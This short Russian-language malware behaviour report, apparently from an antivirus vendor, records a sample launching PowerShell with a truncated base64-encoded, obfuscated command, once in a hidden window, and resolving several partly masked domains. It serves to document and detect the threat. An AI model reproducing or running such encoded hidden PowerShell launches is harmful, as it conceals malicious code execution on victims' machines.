Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABJAG4AYwByAGUAZABpAGIAbABlAF8AVwBvAG8AZABlAG4AXwBUAG8AdwBlAGwAcwBmAGkAbAA9ACcAUwBtAGEAbABsAHYAbwB...
- DNS ASK st####fcoffee.com
- DNS ASK nd#t.ca
- DNS ASK sp#####iltickets.com
- DNS ASK ca#######ousosantoandre.com.br
- DNS ASK sc####teliu.info
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABJAG4AYwByAGUAZABpAGIAbABlAF8AVwBvAG8AZABlAG4AXwBUAG8AdwBlAGwAcwBmAGkAbAA9ACcAUwBtAGEAbABsAHYAbwB...' (со скрытым окном)